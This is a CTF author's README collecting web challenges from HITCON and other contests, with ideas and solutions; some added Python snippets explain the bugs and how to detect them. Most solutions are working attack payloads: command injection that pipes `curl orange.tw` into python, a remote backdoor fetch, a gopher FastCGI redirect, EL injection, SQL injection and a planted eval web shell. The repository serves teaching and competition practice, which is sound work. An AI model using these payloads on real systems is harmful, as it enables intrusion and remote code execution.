My CTF Web Challenges
Hi, I am Orange. This is the repo of CTF challenges I made. It contains each challenge's source code, writeup and some explanation of the idea.
I am a CTFer and Bug Bounty Hunter, loving web hacking and penetration testing. So you will see these challs are all about web. If you have any questions about these challs, you can find me in the following ways:
- orange@chroot.org
- blog.orange.tw
Hope you like it :)
P.s. BTW, the Babyfirst series are my favorite of all these challenges. They are open questions to all and there are lots of creative solutions. If you don't have time to see all of them, please look at these at least!
- Babyfirst
- Babyfirst Revenge
- Babyfirst Revenge v2
Table of Content
HITCON 2017 Quals
- BabyFirst Revenge
- BabyFirst Revenge v2
- SSRFme?
- SQL so Hard
- Baby^H Master PHP 2017
HITCON 2016 Quals
- %%%
- Leaking
- BabyTrick
- Angry Boy
- Angry Seam
HITCON 2015 Quals
- Babyfirst
- nanana
- Giraffe's Coffee
- lalala
- Use-After-FLEE
HITCON 2014 Quals
- PUSHIN CAT
- PY4H4SHER
- LEENODE
WCTF 2016
- BlackBox
AIS3 Final 2015
- SQLPWN
BabyFirst Revenge
Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 5 bytes
Source Code
- index.php
Solution
```bash
# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g
```
You can check exploit.py for the details! There are also lots of creative solutions; you can check the write-ups below.
Write Ups
- HITCON CTF 2017-BabyFirst Revenge-writeup
BabyFirst Revenge v2
Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 4 bytes
Source Code
- index.php
Solution
- generate `g> ht- sl` to file `v`
- reverse file `v` to file `x`
- generate `curl orange.tw|python;`
- execute `x`, `ls -th >g`
- execute `g`
You can check exploit.py for the details!
Write Ups
- script.py from @bennofs
SSRFme?
Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution
Idea
- CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
- Perl looks in the current directory when importing modules
- Perl module URI/lib/URI.pm#L136 will `eval` if there is an unknown scheme
Source Code
- index.php
```bash
$ sudo apt install libwww-perl
```
Solution
```bash
# write evil URI module to current directory
$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl
# eval evil module `orange`
$ curl http://host/?filename=xxx&url=orange://orange.tw
```
Write Ups
TBD
SQL so Hard
Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection
Idea
- MySQL `max_allowed_packet` drops an oversized SQL statement
- Node-Postgres code execution vulnerability
- Exploit the RCE via the SQL `UPDATE` syntax
Source Code
- app.js
Solution
- exploit.py
Write Ups
TBD
Baby^H Master PHP 2017
Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefork
Idea
- PHP performs deserialization when parsing `PHAR` files
- PHP assigns the predictable function name `\x00lambda_%d` to an anonymous function
- Break shared VARIABLE state in Apache Pre-fork mode
Source Code
- index.php
Solution
```bash
# get a cookie
$ curl http://host/ --cookie-jar cookie
# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'
# force apache to fork new process
$ python fork.py &
# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
```
- avatar.gif
- fork.py
Write Ups
No one solved it :(
papapa
Difficulty: ★
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting
Idea
- Leak the internal hostname from SSL certificate
Source Code
- here
Solution
```bash
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternative Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org
...
# get flag
$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
```
Write Ups
- HITCON 2016
- HITCON CTF 2016: %%% (Web) Write-up
- [HITCON 2016] [WEB 100 - %%%] WRITE UP
- hitcon2016 web writeup
Leaking
Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
Idea
- Break JavaScript Sandbox
- Use NodeJS `Buffer(int)` to steal uninitialized memory
- Node.js Buffer knows everything
Source Code
- here
Solution
```bash
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
```
Write Ups
- Hello HitCon 2016 CTF
- HITCON 2016 web summary
- hitcon2016 web writeup
BabyTrick
Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
Idea
- Create an Unexpected Object and Don't Invoke `__wakeup()` in Deserialization
- SugarCRM v6.5.23 PHP deserialization object injection vulnerability
- MySQL UTF-8 collation: `SELECT 'Ä'='a'` is True
Source Code
- here
Solution
```bash
# get password
curl http://1.2.3.4/?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}
# get flag
curl http://1.2.3.4/?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
```
Write Ups
- Hitcon 2016 – Baby Trick
- Hello HitCon 2016 CTF
- hitcon2016 web writeup
Angry Boy
Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java
Idea
- `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`
- When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions
Source Code
- here
Solution
- exploit.py
- decrpt.py
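The byte-to-string behaviour behind the Angry Boy idea, as an added Python example (not code from the challenge repo): Java's lenient `new String(bytes)` with a UTF-8 default charset maps each malformed byte to U+FFFD, which `getBytes()` emits as `EF BF BD`; Python's `errors="replace"` does the same for a lone invalid byte such as `0xFF`, so the four-byte array from the idea round-trips to exactly the bytes the page states. The `looks_mangled` heuristic and the base64 fix are my additions for the defender side; the sample input is constructed from the page's example.

```python
import base64

def java_style_roundtrip(raw: bytes) -> bytes:
    # new String(bytes) with a UTF-8 default charset decodes leniently: every
    # malformed byte becomes U+FFFD, and getBytes() re-encodes that as EF BF BD.
    # Python's errors="replace" matches this for a lone invalid byte like 0xFF
    # (truncated multi-byte sequences may differ in how many U+FFFD appear).
    return raw.decode("utf-8", errors="replace").encode("utf-8")

def survives_text_roundtrip(raw: bytes) -> bool:
    # True only when treating the bytes as text loses nothing, i.e. the
    # input already was valid UTF-8.
    return java_style_roundtrip(raw) == raw

def looks_mangled(data: bytes) -> bool:
    # Detection heuristic for stored keys, IVs or ciphertexts: random bytes
    # almost never contain the encoded replacement character, so its presence
    # usually means binary data was pushed through a String at some point.
    return b"\xef\xbf\xbd" in data

def text_safe_roundtrip(raw: bytes) -> bytes:
    # The fix: carry binary through text fields in an explicit text encoding
    # (base64 here), never via the platform default charset.
    return base64.b64decode(base64.b64encode(raw).decode("ascii"))

# Constructed sample: the byte array from the idea above, new byte[] {1, -1, 1, -1}.
SAMPLE = bytes([0x01, 0xFF, 0x01, 0xFF])

if __name__ == "__main__":
    print(java_style_roundtrip(SAMPLE).hex())       # 01efbfbd01efbfbd, not 01ff01ff
    print(survives_text_roundtrip(SAMPLE))          # False
    print(text_safe_roundtrip(SAMPLE) == SAMPLE)    # True
```

The practical consequence for a cipher built this way is that a key or ciphertext containing any byte above 0x7F is silently replaced before use, which both weakens the key space and makes decryption of real data fail; checking stored material with `looks_mangled` is a cheap way to find such conversions in an existing code base.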
Write Ups
- Angry Boy - Web 300 Problem
Angry Seam
Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization
Idea
- CSS Relative Path Overwrite
- Built-in redirection parameter `actionOutcome`
- RPO Gadgets
- CVE-2010-1871: JBoss Seam Framework remote code execution
Source Code
- here
Solution
P.s. I made this challenge because once, when I tried to review the code of the Seam Framework, I found some 0-days and I thought there must be more. So I threw out a brick to attract jade. And the result was more than I expected :P
Intended solution
Register an account
username: `AAAAAA` password: `AAAAAA` realname: `{/*';*/}%0a@import'http://orange.tw/?`
Report URL
```
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcome=/profile.seam?username%3dAAAAAA
```
Unintended solution
- Register an account
- Update description to
- Login and access
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
```http
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
```
Unintended solution
- CVE-2013-2165 Java deserialization vulnerability
Unintended solution
- SESSION manipulation... seam SUCKS
Write Ups
- Web500 Hitconctf 2016 and exploit CVE-2013-2165
- Angry Seam (500 pts)
Babyfirst
Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection
Idea
- Use `NewLine` to bypass the regular expression check
- Command injection only with alphanumeric characters
Source Code
- here
```php
<?php
highlight_file(__FILE__);
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
    mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
    if ( !preg_match('/^\w+$/', $args[$i]) )
        exit();
}

exec("/bin/orange " . implode(" ", $args));
?>
```
Solution
```
http://localhost/?args[0]=x%0a&args[1]=mkdir&args[2]=orange%0a&args[3]=cd&args[4]=orange%0a&args[5]=wget&args[6]=846465263%0a
http://localhost/?args[0]=x%0a&args[1]=tar&args[2]=cvf&args[3]=aa&args[4]=orange%0a&args[5]=php&args[6]=aa
```
And there are also lots of creative solutions, you can check the write ups below.
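Why a trailing newline gets past `/^\w+$/`, as an added Python example (not code from the challenge repo): Python's `re` gives `$` the same default meaning as PCRE, a match at the very end of the string or just before a final `"\n"`, so `weak_check` behaves like the `preg_match` in the source above, and `strict_check` shows the fix (anchor at the true end of the string; in PHP that is `\z` or the `D` modifier). `commands_seen_by_shell` mirrors the `exec("/bin/orange " . implode(" ", $args))` line to show why one accepted line break is enough. The sample arguments are constructed.

```python
import re

def weak_check(arg: str) -> bool:
    # The validator as written in the challenge. Without PCRE's D modifier
    # (and with Python's default flags) '$' also matches just before a
    # trailing newline, so "x\n" is accepted even though it carries a line break.
    return re.match(r'^\w+$', arg) is not None

def strict_check(arg: str) -> bool:
    # Hardened validator: fullmatch anchors at the real end of the string,
    # the equivalent of /^\w+$/D (or \A\w+\z) in PHP's PCRE.
    return re.fullmatch(r'\w+', arg) is not None

def audit(args):
    # Arguments the weak regex accepts but the strict one rejects: exactly the
    # inputs that reach the shell carrying a newline.
    return [a for a in args if weak_check(a) and not strict_check(a)]

def commands_seen_by_shell(args):
    # Mirror exec("/bin/orange " . implode(" ", $args)) and split the result the
    # way a POSIX shell does: every line is a separate command.
    cmdline = "/bin/orange " + " ".join(args)
    return [line.strip() for line in cmdline.split("\n") if line.strip()]

# Constructed samples: only a value ending in a single "\n" slips through;
# spaces, semicolons and a double newline are all rejected by both checks.
SAMPLE_ARGS = ["x", "x\n", "orange\n", "aa", "a b", "a;b", "x\n\n"]

if __name__ == "__main__":
    for a in SAMPLE_ARGS:
        print(repr(a), weak_check(a), strict_check(a))
    print(audit(SAMPLE_ARGS))                                   # ['x\n', 'orange\n']
    print(commands_seen_by_shell(["x\n", "mkdir", "orange\n"]))  # two commands
```

The general lesson is that an allow-list regex guarding a shell argument must be anchored at both real ends of the input; the alphanumeric restriction itself was never the problem, the anchor was.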
Write Ups
- babyfirst (web 100)
- HITCON CTF 2015 Web 100 Web 300 Writeup
- HITCON 2015 Quals: Babyexploit
- Babyfirst (web, 100p, ?? solves)
nanana
Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN
Idea
- Pwn without library
- Format String without output
- Bypass Stack Guard by overflowing `ARGV[1]`
Source Code
- here
Solution
- exploit.py
Write Ups
- nanana (pwn, web 200)
- HITCON 2015 Quals: Nanana
- Pwning (sometimes) with style - Dragons’ notes on CTFs
Giraffe's Coffee
Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP
Idea
- Break PHP PRNG
- Break shared PRNG STATE in Apache Prefork mode
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
- HITCON 2015 WEB 300
lalala
Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF
Idea
- Bypass SSRF restriction with 302 redirect
- Exploit FASTCGI protocol by using GOPHER
Source Code
- here
Solution
```php
<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
```
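What the redirect above actually hands to php-fpm, as an added Python example (not code from the challenge repo): a small FastCGI record and name-value parser, written from the FastCGI record layout, run over the percent-decoded gopher selector. It assumes, as gopher clients do, that the leading item-type character `x` is dropped and the rest is sent verbatim to port 9000. `audit_stream` is the defender's view: it flags `PHP_ADMIN_VALUE` / `PHP_VALUE` parameters, which rewrite php.ini at request time and should never arrive from anything but a trusted web server.

```python
import struct
from urllib.parse import unquote_to_bytes

# Selector of the gopher:// URL above with the item-type character "x" removed
# (the client does not send it). Percent-decoding gives the raw FastCGI stream.
GOPHER_SELECTOR = (
    "%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00"            # BEGIN_REQUEST, role=responder
    "%01%04Zh%00%86%00%00"                                      # PARAMS, 134 bytes follow
    "%0E%03REQUEST_METHODGET"
    "%0F%0ASCRIPT_FILENAME/www/a.php"
    "%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On"
    "%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x"
    "%01%04Zh%00%00%00%00"                                      # empty PARAMS = end of params
    "%01%05Zh%00%00%00%00"                                      # empty STDIN  = end of body
)
FCGI_STREAM = unquote_to_bytes(GOPHER_SELECTOR)

FCGI_TYPES = {1: "BEGIN_REQUEST", 4: "PARAMS", 5: "STDIN"}
FCGI_PARAMS = 4
# Settings a gateway must never accept from an untrusted peer: they rewrite php.ini.
DANGEROUS_PARAMS = ("PHP_ADMIN_VALUE", "PHP_VALUE")

def parse_records(data: bytes):
    # Each record starts with an 8-byte header: version, type, requestId,
    # contentLength, paddingLength, reserved. Returns (type, request_id, content).
    records, off = [], 0
    while off + 8 <= len(data):
        _ver, rtype, req_id, clen, plen, _res = struct.unpack(">BBHHBB", data[off:off + 8])
        content = data[off + 8:off + 8 + clen]
        records.append((rtype, req_id, content))
        off += 8 + clen + plen
    return records

def parse_params(content: bytes) -> dict:
    # FCGI_PARAMS body: nameLen, valueLen, name, value, repeated. A length is one
    # byte, or four bytes with the top bit set when it exceeds 127.
    params, off = {}, 0

    def read_len():
        nonlocal off
        if content[off] < 0x80:
            n, off = content[off], off + 1
        else:
            n, off = struct.unpack(">I", content[off:off + 4])[0] & 0x7FFFFFFF, off + 4
        return n

    while off < len(content):
        nlen, vlen = read_len(), read_len()
        name = content[off:off + nlen].decode("latin-1"); off += nlen
        value = content[off:off + vlen].decode("latin-1"); off += vlen
        params[name] = value
    return params

def audit_stream(data: bytes):
    # Every php.ini override carried in the PARAMS records of a captured stream.
    findings = []
    for rtype, _req_id, content in parse_records(data):
        if rtype == FCGI_PARAMS and content:
            for name, value in parse_params(content).items():
                if name in DANGEROUS_PARAMS:
                    findings.append((name, value))
    return findings

if __name__ == "__main__":
    for rtype, req_id, content in parse_records(FCGI_STREAM):
        print(FCGI_TYPES.get(rtype, rtype), req_id, len(content))
    print(audit_stream(FCGI_STREAM))
```

Decoding shows the whole chain in one request: `SCRIPT_FILENAME` points at any existing PHP file, `allow_url_include` is switched on and `auto_prepend_file` pulls remote code into it. The root cause is that php-fpm was reachable from a process that follows attacker-chosen redirects; binding it to a unix socket, or restricting `listen.allowed_clients` in the pool config, removes the gopher hop entirely.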
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Hitcon 2015 lalala web400 task
Use-After-FLEE
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
Idea
- Bypass open_basedir
- Bypass disable_functions
- PHP use-after-free exploit writing
- Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
- Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Source Code
- here
Solution
TBD
Write Ups
- Use-After-FLEE (pwn, web 500)
PUSHIN CAT
Solved: 8 / 1020
Difficulty: ★★
Tag: BlackBox, PHP, H2, SQL Injection
Idea
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2014: PUSHIN CAT
- HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
- HITCON CTF 2014
PY4H4SHER
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP
Idea
- Python CGI HTTP Pollution
- MySQL old_password hash collisions
- PBKDF2+HMAC hash collisions explained
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2014: PY4H4SHER
- HITCON CTF 2014: PY4H4SHER WRITEUP
- py4h4sher_solution.py
- HITCON CTF 2014
LEENODE
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
Idea
- Multilayered architecture vulnerability
- Double Encoding
Source Code
- here
Solution
```bash
# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm
# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt
```
Write Ups
- HITCON CTF 2014: LEENODE
- (web) LEENODE [250]
- CTF/Writeup/HITCON2014/LEENODE
BlackBox
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
Idea
- Multilayered architecture vulnerability
- Default and up-to-date mod_jk leads to directory traversal
- Bypass WAF by incorrect usage of BASE64 and URLENCODE
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
- here
Solution
Get source code
```
http://1.2.3.4/login/..;/
```
Review code and find a way to bypass WAF
```bash
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
```
Write shell
```bash
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
$ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
```
Write Ups
TBD
SQLPWN
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition
Idea
- One-byte off SQL Injection
- Race Condition
- Local file inclusion with PHP session
Source Code
- here
Solution
Run exploit.py to win race condition
Login and SQL Injection
```bash
$ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
```
Local file inclusion with session
```bash
$ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220
```
Write Ups
- AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
- AIS3 CTF Final Web1 & Web2